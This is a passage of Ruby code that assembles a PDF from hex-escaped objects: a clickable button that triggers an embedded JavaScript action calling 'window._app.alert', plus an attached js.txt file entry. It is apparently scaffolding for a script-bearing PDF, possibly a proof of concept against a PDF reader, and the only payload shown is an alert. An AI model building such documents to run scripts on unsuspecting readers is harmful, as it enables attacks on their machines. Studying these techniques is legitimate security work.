6\x70\x8d\x30\x4d\x78\x4a\x24\x12\xf9\x44\x1\x31\x84\x98\x44\x2c\x20\x56\x10\x9b\x89\xbd\xc4\xad\xc4\x3\xc4\xe3\xc4\x4b\xc4\xbb\xc4\x59\x12\x89\x64\x45\xf2\x22\x45\x90\xd2\x49\x32\x92\x81\xd4\x45\xda\x42\xda\x47\xfa\x8c\x74\x99\x34\x4d\x7a\x4e\xa6\x91\x1d\xc8\xfe\xe4\x4\x72\x21\x59\x4b\xee\x20\xf\x92\xf7\x90\x3f\x25\x5f\x26\xdf\x23\xbf\xa2\xb0\x28\xae\x94\x30\x4a\x3a\x45\x41\x69\xa4\xf4\x51\xc6\x28\xc7\x28\x17\x29\xd3\x94\x57\x54\x36\x55\x40\x8d\xa0\xe6\x50\x2b\xa8\xed\xd4\x21\xea\x7e\xea\x19\xea\x6d\xea\x13\x1a\x8d\xe6\x44\xb\xa5\x65\xd2\xd4\xb4\xe5\xb4\x21\xda\xef\x68\x9f\xd3\xa6\x68\x2f\xe8\x1c\xba\x27\x5d\x42\x2f\xa2\x1b\xe9\xeb\xe8\x1f\xd2\x8f\xd3\xbf\xa2\x3f\x61\x30\x18\x6e\x8c\x68\x46\x21\xc3\xc0\x58\xc7\xd8\xcd\x38\xc5\xf8\x9a\xf1\xdc\x8c\x6b\xe6\x63\x26\x35\x53\x98\xb5\x99\x8d\x98\x1d\x36\xbb\x6c\xf6\x98\x49\x61\xba\x32\x63\x98\x4b\x99\x4d\xcc\x41\xe6\x21\xe6\x45\xe6\x23\x16\x85\xe5\xc6\x92\xb0\x64\xac\x56\xd6\x8\xeb\x28\xeb\x6\x6b\x96\xcd\x65\x8b\xd8\xe9\x6c\xd\xbb\x97\xbd\x87\x7d\x8e\x7d\x9f\x43\xe2\xb8\x71\xe2\x39\xd\x4e\x27\xe7\x3\xce\x29\xce\x5d\x2e\xc2\x75\xe6\x4a\xb8\x72\xee\xd\xee\x18\xf7\xc\x77\x9a\x47\xe4\x9\x78\x52\x5e\x5\xaf\x87\xf7\x5b\xde\x4\x6f\xc6\x9c\x63\x1e\x68\x9e\x67\xde\x60\x3e\x62\xfe\x89\xf9\x24\x1f\xe1\xbb\xf1\xa5\xfc\x2a\x7e\x1f\xff\x20\xff\x3a\xff\xa5\x85\x9d\x45\x8c\x85\xd2\x62\x8d\xc5\x7e\x8b\xcb\x16\xcf\x2c\x6d\x2c\xa3\x2d\x95\x96\xdd\x96\x7\x2c\xaf\x59\xbe\xb4\xc2\xac\xe2\xad\x2a\xad\x36\x58\x8d\x5b\xdd\xb1\x46\xad\x3d\xad\x33\xad\xeb\xad\xb7\x59\x9f\xb1\x7e\x64\xc3\xb3\x9\xb7\x91\xdb\x74\xdb\x1c\xb4\xb9\x69\xb\xdb\x7a\xda\x66\xd9\x36\xdb\x7e\x60\x7b\xc1\x76\xd6\xce\xde\x2e\xd1\x4e\x67\xb7\xc5\xee\x94\xdd\x23\x7b\xbe\x7d\xb4\x7d\x85\xfd\x80\xfd\xa7\xf6\xf\x1c\xb8\xe\x91\xe\x6a\x87\x1\x87\xcf\x1c\xfe\x8a\x99\x63\x31\x58\x15\x36\x84\x9d\xc6\x66\x1c\x6d\x1d\x93\x1c\x8d\x8e\x3b\x1c\x27\x1c\x5f\x39\x9\x9c\x72\x9d\x3a\x9c\xe\x38\xdd\x71\xa6\x3a\x8b\x9d\xcb\x9c\x7\x9c\x4f\x3a\xcf\xb8\x38\xb8\xa4\xb9\xb4\xb8\xec\x75\xb9\xe9\x4a\x71\x15\xbb\x96\xbb\x6e\x76\x3d\xeb\xfa\xcc\x4d\xe0\x96\xef\xb6\xca\x6d\xdc\xed\xbe\xc0\x52\x20\x15\x34\x9\xf6\xd\x6e\xbb\x33\xdc\xa3\xdc\x6b\xdc\x47\xdd\xaf\x7a\x10\x3d\xc4\x1e\x95\x1e\x5b\x3d\xbe\xf4\x84\x3d\x83\x3c\xcb\x3d\x47\x3c\x2f\x7a\xc1\x5e\xc1\x5e\x6a\xaf\xad\x5e\x97\xbc\x9\xde\xa1\xde\x5a\xef\x51\xef\x1b\x42\xba\x30\x46\x58\x27\xdc\x2b\x9c\xf2\xe1\xfb\xa4\xfa\x74\xf8\x8c\xfb\x3c\xf6\x75\xf1\x2d\xf4\xdd\xe0\x7b\xd6\xf7\xb5\x5f\x90\x5f\x95\xdf\x98\xdf\x2d\x11\x47\x94\x2c\xea\x10\x1d\x13\x7d\xe7\xef\xe9\x2f\xf7\x1f\xf1\xbf\x1a\xc0\x8\x48\x8\x68\xb\x38\x12\xf0\x6d\xa0\x57\xa0\x32\x70\x5b\xe0\x9f\x83\xb8\x41\x69\x41\xab\x82\x4e\x6\xfd\x23\x38\x24\x58\x1f\xbc\x3f\xf8\x41\x88\x4b\x48\x49\xc8\x7b\x21\x37\xc4\x3c\x71\x86\xb8\x57\xfc\x79\x28\x21\x34\x36\xb4\x2d\xf4\xe3\xd0\x17\x61\xc1\x61\x86\xb0\x83\x61\x7f\xf\x17\x86\x57\x86\xef\x9\xbf\xbf\x40\xb0\x40\xb9\x60\x6c\xc1\xdd\x8\xa7\x8\x59\xc4\x8e\x88\xc9\x48\x2c\xb2\x24\xf2\xfd\xc8\xc9\x28\xc7\x28\x59\xd4\x68\xd4\x37\xd1\xce\xd1\x8a\xe8\x9d\xd1\xf7\x62\x3c\x62\x2a\x62\xf6\xc5\x3c\x8e\xf5\x8b\xd5\xc7\x7e\x14\xfb\x4c\x12\x26\x59\x26\x39\x1e\x87\xc4\x25\xc6\x75\xc7\x4d\xc4\x73\xe2\x73\xe3\x87\xe3\xbf\x4e\x70\x4a\x50\x25\xec\x4d\x98\x49\xc\x4a\x6c\x4e\x3c\x9e\x44\x48\x4a\x49\xda\x90\x74\x43\x6a\x27\x95\x4b\x77\x4b\x67\x92\x43\x92\x97\x25\x9f\x4e\xa1\xa7\x64\xa7\xc\xa7\x7c\x93\xea\x99\xaa\x4f\x3d\x96\x6\xa7\x25\xa7\x6d\x4c\xbb\xbd\xd0\x75\xa1\x76\xe1\x78\x3a\x48\x97\xa6\x6f\x4c\xbf\x93\x21\xc8\xa8\xc9\xf8\x43\x26\x31\x33\x23\x73\x24\xf3\x2f\x59\xa2\xac\x96\xac\xb3\xd9\xdc\xec\xe2\xec\x3d\xd9\x4f\x73\x62\x73\xfa\x72\x6e\xe5\xba\xe7\x1a\x73\x4f\xe6\x31\xf3\x8a\xf2\x76\xe7\x3d\xcb\x8f\xcb\xef\xcf\x9f\x5c\xe4\xbb\x68\xd9\xa2\xf3\x5\xd6\x5\xea\x82\x23\x85\xa4\xc2\xbc\xc2\x9d\x85\xb3\x8b\xe3\x17\x6f\x5a\x3c\x5d\x14\x54\xd4\x55\x74\x7d\x89\x60\x49\xc3\x92\x73\x4b\xad\x97\x56\x2d\xfd\xa4\x98\x59\x2c\x2b\x3e\x54\x42\x28\xc9\x2f\xd9\x53\xf2\x83\x2c\x5d\x36\x2a\x9b\x2d\x95\x96\xbe\x57\x3a\x23\x97\xc8\x37\xcb\x1f\x2a\xa2\x15\x3\x8a\x7\xca\x8\x65\xbf\xf2\x5e\x59\x44\x59\x7f\xd9\x7d\x55\x84\x6a\xa3\xea\x41\x79\x54\xf9\x60\xf9\x23\xb5\x44\x3d\xac\xfe\xb6\x22\xa9\x62\x7b\xc5\xb3\xca\xf4\xca\xf\x2b\x7f\xac\xca\xaf\x3a\xa0\x21\x6b\x4a\x34\x47\xb5\x1c\x6d\xa5\xf6\x74\xb5\x7d\x75\x43\xf5\x25\x9d\x97\xae\x4b\x37\x59\x13\x56\xb3\xa9\x66\x46\x9f\xa2\xdf\x59\xb\xd5\x2e\xa9\x3d\x62\xe0\xe1\x3f\x53\x17\x8c\xee\xc6\x95\xc6\xa9\xba\xc8\xba\x91\xba\xe7\xf5\x79\xf5\x87\x1a\xd8\xd\xda\x86\xb\x8d\x9e\x8d\x6b\x1a\xef\x35\x25\x34\xfd\xa6\x19\x6d\x96\x37\x9f\x6c\x71\x6c\x69\x6f\x99\x5a\x16\xb3\x6c\x47\x2b\xd4\x5a\xda\x7a\xb2\xcd\xb9\xad\xb3\x6d\x7a\x79\xe2\xf2\x5d\xed\xd4\xf6\xca\xf6\x3f\x75\xf8\x75\xf4\x77\x7c\xbf\x22\x7f\xc5\xb1\x4e\xbb\xce\xe5\x9d\x77\x57\x26\xae\xdc\xdb\x65\xd6\xa5\xef\xba\xb1\x2a\x7c\xd5\xf6\xd5\xe8\x6a\xf5\xea\x89\x35\x1\x6b\xb6\xac\x79\xdd\xad\xe8\xfe\xa2\xc7\xaf\x67\xb0\xe7\x87\x5e\x79\xef\x17\x6b\x45\x6b\x87\xd6\xfe\xb8\xae\x6c\xdd\x44\x5f\x70\xdf\xb6\xf5\xc4\xf5\xda\xf5\xd7\x37\x44\x6d\xd8\xd5\xcf\xee\x6f\xea\xbf\xbb\x31\x6d\xe3\xe1\x1\x6c\xa0\x7b\xe0\xfb\x4d\xc5\x9b\xce\xd\x6\xe\x6e\xdf\x4c\xdd\x6c\xdc\x3c\x39\x94\xfa\x4f\x0\xa4\x1\x5b\xfe\x98\xb8\x99\x24\x99\x90\x99\xfc\x9a\x68\x9a\xd5\x9b\x42\x9b\xaf\x9c\x1c\x9c\x89\x9c\xf7\x9d\x64\x9d\xd2\x9e\x40\x9e\xae\x9f\x1d\x9f\x8b\x9f\xfa\xa0\x69\xa0\xd8\xa1\x47\xa1\xb6\xa2\x26\xa2\x96\xa3\x6\xa3\x76\xa3\xe6\xa4\x56\xa4\xc7\xa5\x38\xa5\xa9\xa6\x1a\xa6\x8b\xa6\xfd\xa7\x6e\xa7\xe0\xa8\x52\xa8\xc4\xa9\x37\xa9\xa9\xaa\x1c\xaa\x8f\xab\x2\xab\x75\xab\xe9\xac\x5c\xac\xd0\xad\x44\xad\xb8\xae\x2d\xae\xa1\xaf\x16\xaf\x8b\xb0\x0\xb0\x75\xb0\xea\xb1\x60\xb1\xd6\xb2\x4b\xb2\xc2\xb3\x38\xb3\xae\xb4\x25\xb4\x9c\xb5\x13\xb5\x8a\xb6\x1\xb6\x79\xb6\xf0\xb7\x68\xb7\xe0\xb8\x59\xb8\xd1\xb9\x4a\xb9\xc2\xba\x3b\xba\xb5\xbb\x2e\xbb\xa7\xbc\x21\xbc\x9b\xbd\x15\xbd\x8f\xbe\xd\xbe\x84\xbe\xff\xbf\x7a\xbf\xf5\xc0\x70\xc0\xec\xc1\x67\xc1\xe3\xc2\x5f\xc2\xdb\xc3\x58\xc3\xd4\xc4\x51\xc4\xce\xc5\x4b\xc5\xc8\xc6\x46\xc6\xc3\xc7\x41\xc7\xbf\xc8\x3d\xc8\xbc\xc9\x3a\xc9\xb9\xca\x38\xca\xb7\xcb\x36\xcb\xb6\xcc\x35\xcc\xb5\xcd\x35\xcd\xb5\xce\x36\xce\xb6\xcf\x37\xcf\xb8\xd0\x39\xd0\xba\xd1\x3c\xd1\xbe\xd2\x3f\xd2\xc1\xd3\x44\xd3\xc6\xd4\x49\xd4\xcb\xd5\x4e\xd5\xd1\xd6\x55\xd6\xd8\xd7\x5c\xd7\xe0\xd8\x64\xd8\xe8\xd9\x6c\xd9\xf1\xda\x76\xda\xfb\xdb\x80\xdc\x5\xdc\x8a\xdd\x10\xdd\x96\xde\x1c\xde\xa2\xdf\x29\xdf\xaf\xe0\x36\xe0\xbd\xe1\x44\xe1\xcc\xe2\x53\xe2\xdb\xe3\x63\xe3\xeb\xe4\x73\xe4\xfc\xe5\x84\xe6\xd\xe6\x96\xe7\x1f\xe7\xa9\xe8\x32\xe8\xbc\xe9\x46\xe9\xd0\xea\x5b\xea\xe5\xeb\x70\xeb\xfb\xec\x86\xed\x11\xed\x9c\xee\x28\xee\xb4\xef\x40\xef\xcc\xf0\x58\xf0\xe5\xf1\x72\xf1\xff\xf2\x8c\xf3\x19\xf3\xa7\xf4\x34\xf4\xc2\xf5\x50\xf5\xde\xf6\x6d\xf6\xfb\xf7\x8a\xf8\x19\xf8\xa8\xf9\x38\xf9\xc7\xfa\x57\xfa\xe7\xfb\x77\xfc\x7\xfc\x98\xfd\x29\xfd\xba\xfe\x4b\xfe\xdc\xff\x6d\xff\xff\x2\xc\x0\xf7\x84\xf3\xfb\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") - add_object(38, "\xd\x3c\x3c\x2f\x41\x20\x34\x33\x20\x30\x20\x52\x2f\x41\x50\x3c\x3c\x2f\x4e\x20\x35\x31\x20\x30\x20\x52\x3e\x3e\x2f\x44\x41\x28\x2f\x48\x65\x42\x6f\x20\x31\x32\x20\x54\x66\x20\x30\x20\x67\x29\x2f\x46\x20\x34\x2f\x46\x54\x2f\x42\x74\x6e\x2f\x46\x66\x20\x36\x35\x35\x33\x36\x2f\x4d\x4b\x3c\x3c\x2f\x42\x47\x5b\x31\x2e\x30\x20\x31\x2e\x30\x20\x31\x2e\x30\x5d\x2f\x43\x41\x28\x43\x6c\x69\x63\x6b\x20\x6d\x65\x29\x2f\x54\x50\x20\x31\x3e\x3e\x2f\x50\x20\x32\x36\x20\x30\x20\x52\x2f\x52\x65\x63\x74\x5b\x30\x2e\x30\x20\x30\x2e\x36\x31\x34\x38\x36\x38\x20\x36\x31\x31\x2e\x33\x38\x34\x20\x37\x39\x32\x2e\x30\x5d\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x57\x69\x64\x67\x65\x74\x2f\x54\x28\x62\x74\x6e\x43\x6c\x69\x63\x6b\x4d\x65\x29\x2f\x54\x55\x28\x43\x6c\x69\x63\x6b\x20\x6d\x65\x29\x2f\x54\x79\x70\x65\x2f\x41\x6e\x6e\x6f\x74\x3e\x3e\xd") - add_object(43, "\xd\x3c\x3c\x2f\x4a\x53\x20\x34\x36\x20\x30\x20\x52\x2f\x53\x2f\x4a\x61\x76\x61\x53\x63\x72\x69\x70\x74\x3e\x3e\xd") - add_object(51, "\xd\x3c\x3c\x2f\x42\x42\x6f\x78\x5b\x30\x2e\x30\x20\x30\x2e\x30\x20\x36\x31\x31\x2e\x33\x38\x34\x20\x37\x39\x31\x2e\x33\x38\x35\x5d\x2f\x46\x6f\x72\x6d\x54\x79\x70\x65\x20\x31\x2f\x4c\x65\x6e\x67\x74\x68\x20\x36\x34\x2f\x4d\x61\x74\x72\x69\x78\x5b\x31\x2e\x30\x20\x30\x2e\x30\x20\x30\x2e\x30\x20\x31\x2e\x30\x20\x30\x2e\x30\x20\x30\x2e\x30\x5d\x2f\x52\x65\x73\x6f\x75\x72\x63\x65\x73\x3c\x3c\x2f\x50\x72\x6f\x63\x53\x65\x74\x5b\x2f\x50\x44\x46\x5d\x3e\x3e\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x46\x6f\x72\x6d\x2f\x54\x79\x70\x65\x2f\x58\x4f\x62\x6a\x65\x63\x74\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x31\x20\x67\xd\x30\x20\x30\x20\x36\x31\x31\x2e\x33\x38\x33\x38\x20\x37\x39\x31\x2e\x33\x38\x35\x31\x20\x72\x65\xd\x66\xd\x71\xd\x31\x20\x31\x20\x36\x30\x39\x2e\x33\x38\x33\x38\x20\x37\x38\x39\x2e\x33\x38\x35\x31\x20\x72\x65\xd\x57\xd\x6e\xd\x51\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") - # add_object(46, "\xd\x3c\x3c\x2f\x46\x69\x6c\x74\x65\x72\x5b\x2f\x46\x6c\x61\x74\x65\x44\x65\x63\x6f\x64\x65\x5d\x2f\x4c\x65\x6e\x67\x74\x68\x20\x33\x30\x32\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x48\x89\x84\x91\x4d\x4f\xc3\x30\xc\x86\xef\x95\xfa\x1f\xac\x5d\x92\x6a\x25\x41\xe2\x38\xc1\x85\x2b\x70\xe0\xca\x10\x4a\x13\xaf\xd\x34\x49\x95\xba\xfb\x10\xda\x7f\x27\x5d\xe9\x18\x12\x12\x3e\x58\x4e\xe2\xf7\xf5\x23\x67\x33\x78\x4d\x36\x78\xc0\x3d\xea\x81\x90\x57\xd1\x9a\x1a\x4b\xd0\xce\x14\xf0\x99\x67\x90\x22\x22\xd\xd1\xc3\xf4\x24\x6a\xa4\xfb\x56\xf5\x3d\x2f\xc4\x26\xc4\x27\xe5\x90\xb3\x77\xb5\x55\xa2\x55\xbe\x16\xcf\x83\x27\xeb\x90\x15\x93\x74\x8c\x51\xf1\x88\xd4\x4\xc3\x59\x2a\xe7\x8e\xd2\xf\x6d\x5b\x8\xeb\xb7\xe1\x3\xf9\x78\xf8\xbe\x19\x51\xf8\x38\x7f\x95\x67\xc7\x3c\xcb\x33\xbb\xe1\x3b\xeb\x4d\xd8\x89\x37\xd5\x75\x67\x2c\x8a\x87\xb1\x94\x72\x1e\xb4\x55\x11\x3a\x45\xd\xdc\x2\x93\xce\x93\xec\x8d\x56\xd1\x48\x17\x2a\xdb\x62\x44\x65\x30\x8a\x2e\x68\x41\x7b\x62\xab\x1f\xc0\x5f\x3a\xa3\x48\x4d\x49\x7\x27\x94\x9\x15\x8a\x49\xfa\xaf\xcf\xbc\xc3\xb\xd8\x12\x5e\x98\xec\xf\x3d\xa1\x93\x95\xf5\xb2\x6f\x58\xc9\xae\x74\x4a\xa8\x9b\x0\xeb\xc5\x43\x88\xe8\xc0\x76\xfd\xe0\xd6\xb\xb8\x3\x6\xcb\x13\xcb\x6b\x71\x61\x7c\x61\x28\x54\x22\x20\x7e\xc2\x5d\xa6\x6e\x9d\x70\x8\xd\x2b\xe1\x66\x56\x1c\x41\x2b\xd2\xd\xc7\xf3\xa6\xfe\xf6\x48\xbf\x7c\x7d\xd6\xa4\x55\x7f\x9\x30\x0\x67\xa5\x9f\x47\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") - - js = Zlib::Deflate.deflate("window._app.alert('HELLO WORLD', 3);") - add_object(46, "\x0d<</Filter[/FlateDecode]/Length 302>>stream\x0d#{js}\x0dendstream\x0d") - - - add_object(8, "\xd\x3c\x3c\x2f\x43\x6f\x75\x6e\x74\x20\x31\x2f\x46\x69\x72\x73\x74\x20\x39\x20\x30\x20\x52\x2f\x4c\x61\x73\x74\x20\x39\x20\x30\x20\x52\x2f\x50\x61\x72\x65\x6e\x74\x20\x37\x20\x30\x20\x52\x2f\x54\x69\x74\x6c\x65\x28\x4c\x6f\x63\x61\x6c\x20\x44\x69\x73\x6b\x29\x3e\x3e\xd") - add_object(9, "\xd\x3c\x3c\x2f\x44\x65\x73\x74\x5b\x32\x36\x20\x30\x20\x52\x2f\x58\x59\x5a\x20\x30\x20\x37\x39\x32\x20\x6e\x75\x6c\x6c\x5d\x2f\x50\x61\x72\x65\x6e\x74\x20\x38\x20\x30\x20\x52\x2f\x53\x45\x20\x31\x35\x20\x30\x20\x52\x2f\x54\x69\x74\x6c\x65\x28\xfe\xff\x0\x6a\x0\x73\x0\x2e\x0\x74\x0\x78\x0\x74\x29\x3e\x3e\xd") - add_object(17, "\xd\x3c\x3c\x2f\x4e\x61\x6d\x65\x73\x5b\x33\x35\x20\x30\x20\x52\x20\x32\x30\x20\x30\x20\x52\x5d\x3e\x3e\xd") - add_object(18, "\xd\x3c\x3c\x2f\x4e\x61\x6d\x65\x73\x5b\x31\x39\x20\x30\x20\x52\x20\x32\x30\x20\x30\x20\x52\x5d\x3e\x3e\xd") - add_object(19, "\xd\x28\x66\x69\x6c\x65\x3a\x2f\x2f\x2f\x43\x7c\x2f\x74\x65\x6d\x70\x2f\x6a\x73\x2e\x74\x78\x74\x29\xd") - add_object(20, "\xd\x3c\x3c\x2f\x43\x54\x28\x74\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x29\x2f\x49\x44\x20\x33\x35\x20\x30\x20\x52\x2f\x4f\x5b\x32\x36\x20\x30\x20\x52\x5d\x2f\x53\x2f\x53\x50\x53\x2f\x53\x49\x20\x32\x31\x20\x30\x20\x52\x2f\x54\x28\xfe\xff\x0\x6a\x0\x73\x0\x2e\x0\x74\x0\x78\x0\x74\x29\x2f\x54\x53\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x31\x33\x35\x35\x32\x5a\x29\x3e\x3e\xd") - add_object(21, "\xd\x3c\x3c\x2f\x41\x55\x20\x31\x39\x20\x30\x20\x52\x2f\x54\x53\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x31\x33\x35\x35\x32\x5a\x29\x3e\x3e\xd") - add_object(39, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x48\x65\x6c\x76\x65\x74\x69\x63\x61\x2d\x42\x6f\x6c\x64\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x2f\x48\x65\x42\x6f\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") - add_object(47, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x48\x65\x6c\x76\x65\x74\x69\x63\x61\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x2f\x48\x65\x6c\x76\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") - add_object(48, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x5a\x61\x70\x66\x44\x69\x6e\x67\x62\x61\x74\x73\x2f\x4e\x61\x6d\x65\x2f\x5a\x61\x44\x62\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") - add_object(45, "\xd\x3c\x3c\x2f\x44\x69\x66\x66\x65\x72\x65\x6e\x63\x65\x73\x5b\x32\x34\x2f\x62\x72\x65\x76\x65\x2f\x63\x61\x72\x6f\x6e\x2f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x64\x6f\x74\x61\x63\x63\x65\x6e\x74\x2f\x68\x75\x6e\x67\x61\x72\x75\x6d\x6c\x61\x75\x74\x2f\x6f\x67\x6f\x6e\x65\x6b\x2f\x72\x69\x6e\x67\x2f\x74\x69\x6c\x64\x65\x20\x33\x39\x2f\x71\x75\x6f\x74\x65\x73\x69\x6e\x67\x6c\x65\x20\x39\x36\x2f\x67\x72\x61\x76\x65\x20\x31\x32\x38\x2f\x62\x75\x6c\x6c\x65\x74\x2f\x64\x61\x67\x67\x65\x72\x2f\x64\x61\x67\x67\x65\x72\x64\x62\x6c\x2f\x65\x6c\x6c\x69\x70\x73\x69\x73\x2f\x65\x6d\x64\x61\x73\x68\x2f\x65\x6e\x64\x61\x73\x68\x2f\x66\x6c\x6f\x72\x69\x6e\x2f\x66\x72\x61\x63\x74\x69\x6f\x6e\x2f\x67\x75\x69\x6c\x73\x69\x6e\x67\x6c\x6c\x65\x66\x74\x2f\x67\x75\x69\x6c\x73\x69\x6e\x67\x6c\x72\x69\x67\x68\x74\x2f\x6d\x69\x6e\x75\x73\x2f\x70\x65\x72\x74\x68\x6f\x75\x73\x61\x6e\x64\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x62\x61\x73\x65\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x6c\x65\x66\x74\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x72\x69\x67\x68\x74\x2f\x71\x75\x6f\x74\x65\x6c\x65\x66\x74\x2f\x71\x75\x6f\x74\x65\x72\x69\x67\x68\x74\x2f\x71\x75\x6f\x74\x65\x73\x69\x6e\x67\x6c\x62\x61\x73\x65\x2f\x74\x72\x61\x64\x65\x6d\x61\x72\x6b\x2f\x66\x69\x2f\x66\x6c\x2f\x4c\x73\x6c\x61\x73\x68\x2f\x4f\x45\x2f\x53\x63\x61\x72\x6f\x6e\x2f\x59\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x5a\x63\x61\x72\x6f\x6e\x2f\x64\x6f\x74\x6c\x65\x73\x73\x69\x2f\x6c\x73\x6c\x61\x73\x68\x2f\x6f\x65\x2f\x73\x63\x61\x72\x6f\x6e\x2f\x7a\x63\x61\x72\x6f\x6e\x20\x31\x36\x30\x2f\x45\x75\x72\x6f\x20\x31\x36\x34\x2f\x63\x75\x72\x72\x65\x6e\x63\x79\x20\x31\x36\x36\x2f\x62\x72\x6f\x6b\x65\x6e\x62\x61\x72\x20\x31\x36\x38\x2f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x63\x6f\x70\x79\x72\x69\x67\x68\x74\x2f\x6f\x72\x64\x66\x65\x6d\x69\x6e\x69\x6e\x65\x20\x31\x37\x32\x2f\x6c\x6f\x67\x69\x63\x61\x6c\x6e\x6f\x74\x2f\x2e\x6e\x6f\x74\x64\x65\x66\x2f\x72\x65\x67\x69\x73\x74\x65\x72\x65\x64\x2f\x6d\x61\x63\x72\x6f\x6e\x2f\x64\x65\x67\x72\x65\x65\x2f\x70\x6c\x75\x73\x6d\x69\x6e\x75\x73\x2f\x74\x77\x6f\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x74\x68\x72\x65\x65\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x61\x63\x75\x74\x65\x2f\x6d\x75\x20\x31\x38\x33\x2f\x70\x65\x72\x69\x6f\x64\x63\x65\x6e\x74\x65\x72\x65\x64\x2f\x63\x65\x64\x69\x6c\x6c\x61\x2f\x6f\x6e\x65\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x6f\x72\x64\x6d\x61\x73\x63\x75\x6c\x69\x6e\x65\x20\x31\x38\x38\x2f\x6f\x6e\x65\x71\x75\x61\x72\x74\x65\x72\x2f\x6f\x6e\x65\x68\x61\x6c\x66\x2f\x74\x68\x72\x65\x65\x71\x75\x61\x72\x74\x65\x72\x73\x20\x31\x39\x32\x2f\x41\x67\x72\x61\x76\x65\x2f\x41\x61\x63\x75\x74\x65\x2f\x41\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x41\x74\x69\x6c\x64\x65\x2f\x41\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x41\x72\x69\x6e\x67\x2f\x41\x45\x2f\x43\x63\x65\x64\x69\x6c\x6c\x61\x2f\x45\x67\x72\x61\x76\x65\x2f\x45\x61\x63\x75\x74\x65\x2f\x45\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x45\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x49\x67\x72\x61\x76\x65\x2f\x49\x61\x63\x75\x74\x65\x2f\x49\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x49\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x45\x74\x68\x2f\x4e\x74\x69\x6c\x64\x65\x2f\x4f\x67\x72\x61\x76\x65\x2f\x4f\x61\x63\x75\x74\x65\x2f\x4f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x4f\x74\x69\x6c\x64\x65\x2f\x4f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x6d\x75\x6c\x74\x69\x70\x6c\x79\x2f\x4f\x73\x6c\x61\x73\x68\x2f\x55\x67\x72\x61\x76\x65\x2f\x55\x61\x63\x75\x74\x65\x2f\x55\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x55\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x59\x61\x63\x75\x74\x65\x2f\x54\x68\x6f\x72\x6e\x2f\x67\x65\x72\x6d\x61\x6e\x64\x62\x6c\x73\x2f\x61\x67\x72\x61\x76\x65\x2f\x61\x61\x63\x75\x74\x65\x2f\x61\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x61\x74\x69\x6c\x64\x65\x2f\x61\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x61\x72\x69\x6e\x67\x2f\x61\x65\x2f\x63\x63\x65\x64\x69\x6c\x6c\x61\x2f\x65\x67\x72\x61\x76\x65\x2f\x65\x61\x63\x75\x74\x65\x2f\x65\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x65\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x69\x67\x72\x61\x76\x65\x2f\x69\x61\x63\x75\x74\x65\x2f\x69\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x69\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x65\x74\x68\x2f\x6e\x74\x69\x6c\x64\x65\x2f\x6f\x67\x72\x61\x76\x65\x2f\x6f\x61\x63\x75\x74\x65\x2f\x6f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x6f\x74\x69\x6c\x64\x65\x2f\x6f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x64\x69\x76\x69\x64\x65\x2f\x6f\x73\x6c\x61\x73\x68\x2f\x75\x67\x72\x61\x76\x65\x2f\x75\x61\x63\x75\x74\x65\x2f\x75\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x75\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x79\x61\x63\x75\x74\x65\x2f\x74\x68\x6f\x72\x6e\x2f\x79\x64\x69\x65\x72\x65\x73\x69\x73\x5d\x2f\x54\x79\x70\x65\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3e\x3e\xd") - add_object(23, 